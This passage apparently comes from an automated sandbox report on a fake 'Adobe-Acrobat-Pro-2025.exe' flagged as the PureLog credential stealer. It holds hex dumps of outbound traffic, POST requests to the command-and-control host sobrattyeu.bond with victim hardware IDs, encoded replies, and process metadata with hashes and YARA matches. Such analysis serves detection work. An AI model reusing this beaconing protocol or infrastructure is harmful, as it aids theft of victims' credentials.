eb a7 0b 6b Data Ascii: ss@{>yr]6=k<[fq^&-UVe4nRz!Bi\|- 65UM^^WbSPdv.s@ag@CG.LD{2p~8X\|'vlOT`*R6.}nM;@}L0m\| Z"Jxk
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 8b 6a 86 0d e3 05 1f 35 06 2f ea 22 9f d7 97 df 18 5b 6a 68 86 da 92 2d c8 69 89 65 29 2f b4 39 c0 bc 20 96 7d 12 87 e4 05 0e a8 e7 3f 29 71 33 57 3d 93 28 89 81 be 2b 91 8e f4 d4 91 ce 55 40 46 df 15 07 bf 7e 67 2f 83 7d 91 61 1b 4d ee 2e cd 8b 6d ba 9a 54 d6 9f 09 0d 57 82 49 7a 1d a9 09 17 a1 2b 63 eb 44 7b 18 46 ee 11 cc 03 ad 87 40 4f c9 93 a6 49 4c 23 c1 95 00 e4 07 07 86 77 1c 1a 1f e3 0a 8b fe 1a ca be 56 73 e8 40 93 91 9d ea 7f 0c 92 38 bd 4b 04 7f 38 d4 81 63 c2 b0 e8 24 30 08 cf 19 a8 70 7a 88 2f 2f 02 81 90 ae 93 c2 7a 31 3d 1a af df c4 0b b5 26 34 1b 9b 07 42 2c ec ba a4 50 c7 44 41 2a af 65 b4 e5 be 85 53 ad e6 cc 74 f4 f5 4b c0 96 ca 7b f3 6e 3a 9a 3e c5 51 02 a3 aa 26 fd e7 41 4e 7c 6d 9a 36 14 a0 20 29 79 75 ed 52 93 dd 38 d7 db 1d be c0 Data Ascii: j5/"[jh-ie)/9 }?)q3W=(+U@F~g/}aM.mTWIz+cD{F@OIL#wVs@8K8c$0pz//z1=&4B,PDA*eStK{n:>Q&AN\|m6 )yuR8
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 8c 81 6c 0e a0 0b de cb 74 31 c0 f4 b3 05 a7 6d 60 cf 7c e1 50 c4 d4 bd 8d de 4d c4 a2 7e 6b 63 3f 2b b1 27 21 24 d9 70 45 be ab b1 37 ac 43 b4 e1 40 4a 55 98 19 99 76 30 4d b7 7b 5c 9b 31 ce 72 e0 3e 88 a2 ed 47 09 3e 51 ca 48 7f 1c e9 8c 28 65 2e 98 71 16 38 37 b6 3e 61 4c 46 d1 f1 0e 1a 2f 84 c6 d3 74 c7 d2 83 25 9e cb c0 93 a8 ed 60 3b 47 15 1c 12 0c e1 9b 3d 54 fb 78 5b 49 27 83 39 a0 c2 a9 64 8f 55 9d e1 e3 02 28 15 f3 f3 74 7c 16 d3 8e 60 e6 03 e1 d3 90 ba 22 af ea 65 36 c2 1d dd a8 25 d7 25 49 69 8e c4 92 2a 4b d3 54 6c fc 06 76 d7 d5 55 38 f9 23 25 51 60 f8 2c e4 a6 36 24 a7 10 f1 24 18 f3 f8 07 61 44 b7 76 91 28 19 ef 6c 9b ad 65 51 86 31 d0 6e a9 8b bd 79 6d 8c 25 da e2 6f b7 85 be 6d 48 ac 33 73 25 aa 7a 53 5b c0 1c ce 0c 92 b8 e2 5d f0 f8 e6 Data Ascii: lt1m`\|PM~kc?+'!$pE7C@JUv0M{\1r>G>QH(e.q87>aLF/t%`;G=Tx[I'9dU(t\|`"e6%%Ii*KTlvU8#%Q`,6$$aDv(leQ1nym%omH3s%zS[]
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 69 d5 01 df e5 1d 4d 96 1a d2 2c 00 97 65 bd 91 ef d8 74 c2 21 78 92 23 e8 8b 2b 5e e2 95 dc 3e 1d 63 3c b6 2a c6 c4 cd d7 77 53 31 51 c9 ea 68 48 fc 08 93 e2 0b ba ca fc bf 48 5d e2 9e 06 ec db 4b a7 be f1 26 96 ff 18 18 10 93 01 9d b6 de 48 7b ee c8 66 ad 50 17 ed 87 3a e2 78 fb ae ba 45 d8 2f 9a 95 3d e4 0d 55 de ea c4 1f 70 8d 61 77 e0 b8 d5 25 bc 7d 6c 56 82 b6 11 49 ff 7b c9 c2 f4 1e 4d 83 77 68 f6 fb fd 1a ed 02 45 7d d7 fb fb 48 0e 39 e3 ac 13 3a e3 cc 8c dc 44 82 f8 7d 59 70 7f fd da 49 89 56 85 dd 78 79 66 05 b7 8a 92 ff f2 cd e5 07 f8 fc 95 47 49 92 9d 15 d6 fb 8c 5a a0 9a 1c c7 77 d1 05 15 17 f2 a5 94 95 61 52 0a 75 a6 69 07 fe 4d 21 9a 75 d1 7f 30 fc 6a 04 c5 d3 ea a0 9e df 65 c9 6d d6 cf e2 5f c8 c4 a3 1e 3c f9 64 f1 00 c1 82 cb 33 98 3c b7 Data Ascii: iM,et!x#+^>c<*wS1QhHH]K&H{fP:xE/=Upaw%}lVI{MwhE}H9:D}YpIVxyfGIZwaRuiM!u0jem_<d3<
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 41 89 5c 0d 0a 14 59 04 40 b6 6d a6 94 8f 0f 3b 92 08 d8 63 fa 10 a9 21 d4 e6 2b f9 30 a7 28 92 7a 18 9b bb 0c 19 7c e6 99 29 a7 c4 a3 3f 46 f2 2c 2e 2c 57 0c 3c 91 09 3d 8d b4 cf cf 51 a6 2f ca 78 93 3f 62 da 1c 2f f3 03 04 73 ff 3d 22 13 1e 93 81 c8 f6 dc 5f 86 ea 85 5b 1f a5 ed 65 a9 ef 15 bf 3a 31 e0 73 b4 ac d9 6a 5f ae 4e fd 64 a3 04 f9 49 f8 84 5f 2c bf e2 d7 73 20 cc f1 b5 72 62 6d 38 9a 99 79 5c 09 2b 7c 40 b1 5d 22 cc 95 3f b6 6c fb 2c 3e 51 1b 21 2d b4 7b 7d f4 07 45 91 51 b9 ed 15 ef 51 33 b5 54 18 57 23 23 70 fd c2 09 d3 71 f0 61 31 89 84 9f f6 c5 bc 91 a3 b5 4f d4 04 34 f8 29 0c af 47 52 2c 31 4d 4b 38 3d ae d9 58 1f 4c 32 31 32 21 c6 21 72 22 13 e3 6b f4 96 f3 69 34 35 a4 f3 8c 64 7a 5b 03 55 09 36 46 51 65 50 5d 3d 9a 3c 7d 38 b4 e2 8d 76 Data Ascii: A\Y@m;c!+0(z\|)?F,.,W<=Q/x?b/s="_[e:1sj_NdI_,s rbm8y\+\|@]"?l,>Q!-{}EQQ3TW##pqa1O4)GR,1MK8=XL212!!r"ki45dz[U6FQeP]=<}8v
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: db 6f 4d 54 9f d3 e7 c9 42 39 04 82 85 c9 4d ca 98 38 3e f1 34 5d 06 75 9d 2d 41 4e 48 8c 6f 6f 2b 5a be 79 5f 93 b5 21 22 38 65 68 30 6f 25 4b fb 74 0a 99 e6 46 ac 3b 8c f8 6f 8e bc 67 b7 08 f3 ee 73 e7 ff 79 ee ff 09 0d fd 3b c0 03 42 01 a0 ee da 05 08 23 f4 ec 37 36 89 3f 95 61 d8 f6 b3 5a cd ad 7f 9a 9e 65 d8 26 63 5b 6b 7b 62 d6 b4 94 4f 01 fb fa 30 5b 5e 26 79 67 4e e3 3d 5d 3c f4 bc 02 b3 10 08 11 98 43 3c c9 c0 f3 3a b8 b2 aa 28 36 ce 33 54 0c de af 3c f5 e1 4a 71 8f 0f 48 12 70 de 3f ce 1d ea 69 08 13 07 c2 e2 73 c4 b8 6d 51 f0 42 ee 58 f7 99 f5 87 11 21 83 80 54 c2 3d 0b b4 72 25 a3 15 f7 a1 68 45 a8 1e 89 d0 9e 75 cd df 67 a1 88 cf d1 0b c2 fe cc 31 91 2b 71 15 6e 30 e0 e7 ae 4b 47 45 20 c3 3e 59 0d 8a d4 87 ea d9 01 1e 45 f3 43 ec 93 ab d7 57 Data Ascii: oMTB9M8>4]u-ANHoo+Zy_!"8eh0o%KtF;ogsy;B#76?aZe&c[k{bO0[^&ygN=]<C<:(63T<JqHp?ismQBX!T=r%hEug1+qn0KGE >YECW
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 1a 0b d6 a6 a6 c4 07 13 ab 2d a4 21 12 19 1a c6 80 35 b5 f2 4a 14 a8 3f c5 4b 22 73 10 fd 21 af 73 f0 dd f8 c0 ef 59 97 cf 83 66 07 34 79 92 9c 53 7d 60 90 c7 da b1 0c cc b8 d2 e8 c8 5d 47 8b 49 0e 23 c9 b2 e2 7b b1 73 75 a0 39 6a a6 fc 53 58 04 1f 7c 17 0d a9 0b 00 3f 6d 6c c5 6b 04 6d 3b 32 e1 7f ba cb 03 41 f3 53 a6 07 61 e0 bf b2 31 8f dd fe 42 84 18 cf b7 a4 67 15 d2 bf 1a 6f 9a 4b b8 bf ed 6f a2 69 43 7c d6 aa 64 b4 4e bf d8 ae 77 64 6f 45 c9 fd 0f b1 79 24 7e 6c 5d 56 e7 da b1 de dc 76 81 b3 01 c9 09 d1 36 23 d1 5f bf 18 4f 7f 22 bf 8a 85 5d 8d f0 64 31 40 2a c5 93 9f 40 79 09 f0 1b f9 b3 59 da 0d 9b 2f 8f 19 30 8e 23 89 82 eb 55 1e c5 b1 b1 36 85 cf 0c d9 7f dd 6b 11 b4 90 af 24 41 48 1b fb 8a 49 47 dd 4a 25 5e c7 16 3e a9 1f 2c 0c 04 c5 34 4f 33 Data Ascii: -!5J?K"s!sYf4yS}`]GI#{su9jSX\|?mlkm;2ASa1BgoKoiC\|dNwdoEy$~l]Vv6#_O"]d1@*@yY/0#U6k$AHIGJ%^>,4O3
2025-01-15 15:14:42 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=64csupqqqu5bp9c6h2kn4l6k1p; expires=Sun, 11 May 2025 09:01:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlH4vK5yjdI1UxuITElRAuyaiZZ0QJ1aHImJ1mBBUg%2B2lpmQ5LYjGITF4lEkFjzQcVYtSv3iYN0NfilIPk5aHiCe9DeW8mwC9L6XEX7kwL0Afswb%2FsJKy1Ifl2wUEzA9KDM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d114aef243ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1735&rtt_var=656&sent=318&recv=591&lost=0&retrans=0&sent_bytes=2835&recv_bytes=571856&delivery_rate=1661923&cwnd=228&unsent_bytes=0&cid=c12b70beefb6b82b&ts=2856&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49808	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:42 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: sobrattyeu.bond
2025-01-15 15:14:42 UTC	86	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d 26 68 77 69 64 3d 30 39 31 35 30 31 35 44 41 41 36 31 36 38 46 43 38 32 35 37 31 44 39 39 41 38 45 42 30 41 39 38 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--899083440&j=&hwid=0915015DAA6168FC82571D99A8EB0A98
2025-01-15 15:14:43 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mlglcg817h4aiq06d4gjp0ek8f; expires=Sun, 11 May 2025 09:01:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2F44KsKXGDQc%2Fg%2B%2F%2BWT6zYVKw5IASIt4NHy47D2YsAQqw%2F61UU4duF0pAlNqVWxpCgMkGCJRsbGFTbiaD4eXONB5XlaaYJ6YI0DqpmxqBwLD6fBAn8QXST1KGrAa%2FCpRXiA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d1298c748c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1970&rtt_var=749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=985&delivery_rate=1449851&cwnd=223&unsent_bytes=0&cid=9c365cbb9e584dbe&ts=506&x=0"
2025-01-15 15:14:43 UTC	238	IN	Data Raw: 31 61 66 38 0d 0a 56 6c 55 6a 74 39 45 46 35 42 67 4e 6c 79 66 67 58 39 59 70 65 7a 33 62 76 48 55 4d 79 49 7a 51 64 46 45 44 79 35 48 64 43 4c 77 4e 4c 67 48 52 70 53 66 65 4b 53 47 31 51 73 4a 6c 35 77 56 5a 57 66 6d 47 56 30 61 6c 32 72 30 66 4f 6c 6e 34 71 61 55 6a 38 78 4d 4a 44 4e 32 70 62 4b 70 4f 57 4f 52 30 72 78 65 55 59 7a 39 38 73 2b 77 6b 52 2f 37 45 74 78 73 2b 58 2b 54 44 69 44 2f 33 50 69 64 7a 7a 2b 64 57 74 69 74 72 37 57 2f 55 4d 49 49 43 4b 33 71 53 6a 53 4e 66 73 4d 58 6b 46 78 52 6f 68 74 4b 59 4d 66 30 6e 4f 6b 62 30 75 47 2f 64 58 6c 6e 6b 56 71 4d 46 75 6e 4d 4c 64 35 7a 59 4b 53 4f 46 36 72 6f 63 41 54 66 7a 79 4c 64 65 36 68 6f 51 53 64 2b 6d 56 72 56 76 52 4d 4d 58 6f 79 71 2b Data Ascii: 1af8VlUjt9EF5BgNlyfgX9Ypez3bvHUMyIzQdFEDy5HdCLwNLgHRpSfeKSG1QsJl5wVZWfmGV0al2r0fOln4qaUj8xMJDN2pbKpOWOR0rxeUYz98s+wkR/7Etxs+X+TDiD/3Pidzz+dWtitr7W/UMIICK3qSjSNfsMXkFxRohtKYMf0nOkb0uG/dXlnkVqMFunMLd5zYKSOF6rocATfzyLde6hoQSd+mVrVvRMMXoyq+
2025-01-15 15:14:43 UTC	1369	IN	Data Raw: 48 54 42 32 6c 50 45 6a 51 37 48 6a 6d 7a 77 6a 59 4b 58 55 76 30 79 58 49 68 35 56 78 6f 30 71 69 53 46 66 38 58 61 68 62 59 4e 62 53 33 65 55 2f 77 77 36 2f 63 4c 6b 48 51 4e 57 67 75 61 58 58 59 6f 78 4a 6b 66 6b 67 31 53 77 4b 31 66 77 63 4b 63 38 74 78 78 4e 55 61 2f 30 4f 47 47 76 36 59 49 67 4a 47 75 73 71 4c 67 2b 32 32 38 55 55 6f 4f 42 56 6f 31 79 65 4e 46 2f 6a 79 36 55 59 44 56 35 72 65 6f 79 61 4a 53 6a 6e 52 49 37 61 35 75 6c 35 56 2f 57 41 41 4e 54 39 72 35 74 67 32 6c 63 34 47 32 30 62 35 56 63 45 30 53 51 39 79 55 38 6e 73 4f 70 47 78 74 74 6e 66 79 32 59 2b 59 34 62 56 75 63 6e 6b 43 34 4e 32 66 76 54 71 34 4a 67 30 59 6f 63 6f 50 2b 50 30 69 4a 35 4b 59 6c 47 6a 53 6c 39 72 4a 6e 34 48 6b 48 64 6f 43 61 59 6f 4e 43 57 76 5a 30 73 6a 47 Data Ascii: HTB2lPEjQ7HjmzwjYKXUv0yXIh5Vxo0qiSFf8XahbYNbS3eU/ww6/cLkHQNWguaXXYoxJkfkg1SwK1fwcKc8txxNUa/0OGGv6YIgJGusqLg+228UUoOBVo1yeNF/jy6UYDV5reoyaJSjnRI7a5ul5V/WAANT9r5tg2lc4G20b5VcE0SQ9yU8nsOpGxttnfy2Y+Y4bVucnkC4N2fvTq4Jg0YocoP+P0iJ5KYlGjSl9rJn4HkHdoCaYoNCWvZ0sjG
2025-01-15 15:14:43 UTC	1369	IN	Data Raw: 65 2b 45 4c 47 61 65 32 70 77 78 4f 32 75 38 77 6f 78 2f 39 51 4a 6c 59 4d 4b 35 4d 61 39 54 58 61 64 78 72 79 61 35 59 78 5a 72 74 74 63 65 56 76 75 30 71 46 38 65 52 70 65 2b 74 33 44 56 47 41 4e 32 78 49 4a 4b 72 46 70 48 30 32 61 49 44 34 64 69 54 58 57 38 30 78 70 51 35 39 36 46 51 78 70 6b 70 73 75 4b 61 65 38 45 4f 30 58 4e 6d 54 48 51 54 43 62 48 59 4b 6c 75 67 48 6f 44 64 4f 2f 66 4d 47 65 46 7a 35 56 4e 45 48 47 6b 39 4a 35 68 31 6d 38 54 64 38 53 67 52 72 35 30 56 2b 64 74 70 7a 75 4b 42 6a 5a 62 73 64 51 6c 4f 50 44 56 75 69 49 48 54 34 37 37 74 58 2f 76 42 79 4a 71 34 2b 46 47 6b 58 41 35 33 47 79 77 62 34 42 6d 41 6c 4b 52 30 53 4e 68 6f 2b 65 4b 52 32 6c 37 34 4e 36 59 56 4a 4d 38 4c 55 72 35 68 31 43 58 53 30 4c 66 5a 61 6f 62 6c 30 45 72 Data Ascii: e+ELGae2pwxO2u8wox/9QJlYMK5Ma9TXadxrya5YxZrttceVvu0qF8eRpe+t3DVGAN2xIJKrFpH02aID4diTXW80xpQ596FQxpkpsuKae8EO0XNmTHQTCbHYKlugHoDdO/fMGeFz5VNEHGk9J5h1m8Td8SgRr50V+dtpzuKBjZbsdQlOPDVuiIHT477tX/vByJq4+FGkXA53Gywb4BmAlKR0SNho+eKR2l74N6YVJM8LUr5h1CXS0LfZaobl0Er
2025-01-15 15:14:43 UTC	1369	IN	Data Raw: 64 57 6f 4c 72 6c 48 78 55 32 6e 4f 47 37 62 66 51 43 49 6b 6e 66 67 54 47 34 4e 32 65 76 44 4b 30 31 6d 6e 41 42 57 71 6a 70 50 6c 57 63 76 4a 4d 5a 4a 45 57 52 71 49 51 37 6a 77 55 78 59 64 4f 4c 64 4c 35 36 56 61 64 6a 30 53 65 6c 62 79 6b 45 6f 59 6b 70 49 37 37 34 73 6a 59 38 4d 76 37 34 75 55 33 74 45 67 5a 47 2f 5a 52 4e 72 58 5a 45 39 47 69 53 47 75 64 4d 43 58 65 56 31 78 64 67 72 74 32 63 4e 67 68 45 6d 61 47 4d 50 59 38 64 49 55 66 41 70 30 54 54 51 45 6a 74 53 6f 56 30 34 6b 4d 42 56 65 4c 59 46 69 66 6a 33 4c 30 2b 42 6d 62 36 70 75 31 41 2b 6a 77 4a 44 4e 79 41 51 61 5a 7a 52 64 4e 4a 68 41 61 51 65 45 31 4d 6a 66 55 52 59 2f 72 6a 70 45 5a 6f 61 36 72 5a 37 48 48 39 5a 79 77 52 34 65 5a 31 76 6d 41 31 2b 55 53 7a 42 5a 4a 4d 4f 55 57 71 2f Data Ascii: dWoLrlHxU2nOG7bfQCIknfgTG4N2evDK01mnABWqjpPlWcvJMZJEWRqIQ7jwUxYdOLdL56Vadj0SelbykEoYkpI774sjY8Mv74uU3tEgZG/ZRNrXZE9GiSGudMCXeV1xdgrt2cNghEmaGMPY8dIUfAp0TTQEjtSoV04kMBVeLYFifj3L0+Bmb6pu1A+jwJDNyAQaZzRdNJhAaQeE1MjfURY/rjpEZoa6rZ7HH9ZywR4eZ1vmA1+USzBZJMOUWq/
2025-01-15 15:14:43 UTC	1369	IN	Data Raw: 65 75 54 67 69 5a 37 76 41 76 45 6e 56 50 47 42 6c 77 71 46 63 70 33 5a 65 77 58 76 50 43 35 4a 4f 49 6c 79 31 2f 30 31 6c 68 75 47 45 50 41 56 6e 68 39 53 6e 50 4e 34 6b 4c 46 54 32 2b 6d 71 6f 62 58 66 76 48 35 45 6c 70 47 77 30 52 4c 54 33 45 55 61 6a 74 5a 30 37 59 6c 2f 6b 32 36 6c 45 2b 53 41 2f 57 2f 53 70 59 62 4e 49 53 4f 51 54 69 67 6d 79 62 53 67 45 69 63 38 55 4f 4a 33 31 6f 6a 67 30 63 4b 6d 6a 74 6d 4f 4b 46 52 52 58 7a 65 56 50 6b 79 68 38 6f 68 61 46 4b 4c 74 36 53 56 57 2f 32 69 64 75 2f 2f 36 59 4c 52 35 45 34 4b 48 6c 66 39 68 6b 5a 46 6e 6a 6c 30 6d 70 61 55 6e 4e 56 71 6c 75 70 6d 4d 4d 63 4a 47 4a 4e 69 65 66 77 6f 49 6c 59 55 79 63 36 34 73 37 31 69 45 47 63 75 4f 79 59 4b 31 2f 4f 2b 39 45 71 52 32 39 55 41 70 46 6c 65 51 62 50 62 Data Ascii: euTgiZ7vAvEnVPGBlwqFcp3ZewXvPC5JOIly1/01lhuGEPAVnh9SnPN4kLFT2+mqobXfvH5ElpGw0RLT3EUajtZ07Yl/k26lE+SA/W/SpYbNISOQTigmybSgEic8UOJ31ojg0cKmjtmOKFRRXzeVPkyh8ohaFKLt6SVW/2idu//6YLR5E4KHlf9hkZFnjl0mpaUnNVqlupmMMcJGJNiefwoIlYUyc64s71iEGcuOyYK1/O+9EqR29UApFleQbPb
2025-01-15 15:14:43 UTC	1198	IN	Data Raw: 4a 57 4b 78 6f 70 56 69 69 78 34 50 5a 6f 43 33 59 36 35 71 61 76 31 73 6b 7a 75 6e 61 43 68 72 34 74 49 59 66 4c 2b 2f 67 42 35 69 52 36 62 39 6e 33 43 4b 45 47 5a 36 78 71 42 79 6e 6e 78 6f 78 31 4f 57 44 4f 4e 48 51 33 4b 75 31 42 70 59 75 66 61 69 4d 52 35 36 70 4d 43 53 55 64 30 6a 41 48 47 45 74 32 75 76 56 56 66 77 46 70 6b 37 6a 32 77 63 55 4a 6e 32 50 56 57 2b 37 62 31 41 49 55 71 67 70 4f 39 74 7a 7a 6b 4a 44 4f 57 45 4d 71 39 77 54 4b 4a 50 6b 51 71 54 52 78 38 57 67 34 67 4e 59 59 7a 55 71 54 46 36 64 4a 2f 38 76 6d 57 58 47 54 6c 41 39 4a 52 68 33 43 39 6d 32 33 2b 57 62 70 35 6b 43 47 69 4e 68 52 74 68 70 2f 7a 6e 4d 43 56 66 35 4f 69 74 62 39 59 79 46 68 76 2b 75 31 4f 79 56 44 6a 35 63 59 39 74 6b 78 77 79 53 4b 4f 45 47 45 75 4a 2b 37 51 Data Ascii: JWKxopViix4PZoC3Y65qav1skzunaChr4tIYfL+/gB5iR6b9n3CKEGZ6xqBynnxox1OWDONHQ3Ku1BpYufaiMR56pMCSUd0jAHGEt2uvVVfwFpk7j2wcUJn2PVW+7b1AIUqgpO9tzzkJDOWEMq9wTKJPkQqTRx8Wg4gNYYzUqTF6dJ/8vmWXGTlA9JRh3C9m23+Wbp5kCGiNhRthp/znMCVf5Oitb9YyFhv+u1OyVDj5cY9tkxwySKOEGEuJ+7Q
2025-01-15 15:14:43 UTC	1369	IN	Data Raw: 31 62 64 38 0d 0a 65 61 6a 30 68 45 33 78 4d 41 56 6b 2f 75 42 54 74 32 42 70 32 57 32 7a 4f 70 31 42 41 6e 36 48 6b 79 4e 2b 76 73 2b 42 47 52 39 4e 6c 37 36 36 59 76 38 34 41 56 48 4f 75 55 32 41 52 43 4c 61 51 59 63 4a 6a 31 41 65 64 49 2f 45 49 6c 44 6e 32 4f 63 64 48 55 79 70 77 6f 74 78 37 7a 77 73 5a 59 53 6a 53 37 51 70 57 39 68 51 69 47 69 5a 55 42 77 45 6d 50 30 6e 59 4a 7a 4c 6b 6a 41 5a 65 62 50 34 6b 31 37 70 4a 51 42 32 38 6f 30 71 6b 47 45 39 70 46 47 56 5a 71 42 48 43 6b 2b 42 32 69 78 31 71 64 53 67 49 44 67 6f 38 73 69 6e 50 2f 73 41 47 48 72 79 6e 47 4f 30 58 30 53 6d 63 62 4d 6e 68 48 67 76 46 75 6a 65 4a 69 66 6a 75 2b 4a 66 4e 48 4b 2f 2f 65 52 69 39 69 59 77 54 2f 69 64 4d 74 56 4a 61 74 4a 39 74 53 65 78 65 41 4d 46 34 2b 55 66 57 Data Ascii: 1bd8eaj0hE3xMAVk/uBTt2Bp2W2zOp1BAn6HkyN+vs+BGR9Nl766Yv84AVHOuU2ARCLaQYcJj1AedI/EIlDn2OcdHUypwotx7zwsZYSjS7QpW9hQiGiZUBwEmP0nYJzLkjAZebP4k17pJQB28o0qkGE9pFGVZqBHCk+B2ix1qdSgIDgo8sinP/sAGHrynGO0X0SmcbMnhHgvFujeJifju+JfNHK//eRi9iYwT/idMtVJatJ9tSexeAMF4+UfW
2025-01-15 15:14:43 UTC	1369	IN	Data Raw: 43 45 45 43 70 6f 5a 52 6d 35 57 49 6c 64 6f 53 39 52 4e 52 75 59 61 56 70 31 47 69 61 65 78 56 62 6f 64 49 77 59 36 37 2b 35 69 41 30 55 35 2f 68 6e 6a 76 30 50 78 31 31 2b 71 5a 48 71 6c 46 46 2f 48 2b 6a 50 49 42 35 48 67 71 76 7a 54 5a 57 70 4f 32 30 45 52 78 66 35 4f 66 6c 50 39 73 41 44 45 54 53 6c 30 47 46 4c 44 72 36 56 72 49 49 6e 33 38 34 5a 4b 2f 45 48 32 53 70 78 4f 45 4e 4f 33 53 6f 33 4c 52 34 7a 44 63 54 45 63 32 54 62 70 64 71 65 65 42 68 74 6d 61 73 66 79 4a 62 6e 4d 67 68 65 4c 44 41 71 54 49 6d 54 70 6a 56 74 30 2f 32 47 67 46 49 31 61 74 73 76 56 46 4b 78 56 32 75 4e 5a 35 73 41 32 65 74 69 78 6c 42 67 62 2f 6a 50 43 4d 37 38 38 6d 4d 50 74 68 67 47 48 72 47 68 55 36 6f 65 33 37 74 53 49 55 63 73 56 78 44 65 36 6e 71 45 45 2b 6d 35 75 Data Ascii: CEECpoZRm5WIldoS9RNRuYaVp1GiaexVbodIwY67+5iA0U5/hnjv0Px11+qZHqlFF/H+jPIB5HgqvzTZWpO20ERxf5OflP9sADETSl0GFLDr6VrIIn384ZK/EH2SpxOENO3So3LR4zDcTEc2TbpdqeeBhtmasfyJbnMgheLDAqTImTpjVt0/2GgFI1atsvVFKxV2uNZ5sA2etixlBgb/jPCM788mMPthgGHrGhU6oe37tSIUcsVxDe6nqEE+m5u
2025-01-15 15:14:43 UTC	1369	IN	Data Raw: 6e 4f 4b 50 62 66 51 47 44 32 65 45 75 55 69 78 55 7a 2b 6b 54 36 73 77 37 6e 4d 75 44 72 72 62 45 46 61 65 32 34 4d 58 47 57 57 44 32 66 5a 2f 36 43 41 7a 5a 49 4c 67 55 70 31 67 58 2f 68 45 30 54 53 62 61 6a 35 4f 6d 73 30 6c 61 59 44 35 75 67 34 58 55 49 48 67 6c 55 72 51 48 42 39 71 38 62 55 39 70 58 35 31 31 57 69 45 5a 37 4a 48 4c 58 71 58 2b 6a 68 6b 2b 4f 32 42 47 32 56 51 68 74 4b 79 52 6f 67 31 4a 48 50 78 68 30 79 7a 64 30 76 41 63 62 45 30 76 78 78 49 53 37 50 67 57 6a 75 4e 75 72 34 4d 4a 47 65 65 38 4b 35 51 39 78 34 32 46 76 54 68 62 61 39 37 52 71 55 55 69 43 32 35 48 53 31 6f 74 50 63 64 61 35 4c 65 68 79 63 55 4d 4b 33 64 6c 53 50 74 41 69 4a 7a 2f 35 77 30 73 6b 74 31 77 78 4f 45 4b 4c 31 69 4e 48 69 6a 37 51 52 57 72 63 71 39 48 6a 70 Data Ascii: nOKPbfQGD2eEuUixUz+kT6sw7nMuDrrbEFae24MXGWWD2fZ/6CAzZILgUp1gX/hE0TSbaj5Oms0laYD5ug4XUIHglUrQHB9q8bU9pX511WiEZ7JHLXqX+jhk+O2BG2VQhtKyRog1JHPxh0yzd0vAcbE0vxxIS7PgWjuNur4MJGee8K5Q9x42FvThba97RqUUiC25HS1otPcda5LehycUMK3dlSPtAiJz/5w0skt1wxOEKL1iNHij7QRWrcq9Hjp

Target ID:	0
Start time:	10:14:20
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe"
Imagebase:	0x10000
File size:	459'376 bytes
MD5 hash:	B3EEA0239B9E344A94A25D0C0C17C9D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2170361115.0000000000012000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:14:20
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe"
Imagebase:	0x9b0000
File size:	459'376 bytes
MD5 hash:	B3EEA0239B9E344A94A25D0C0C17C9D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

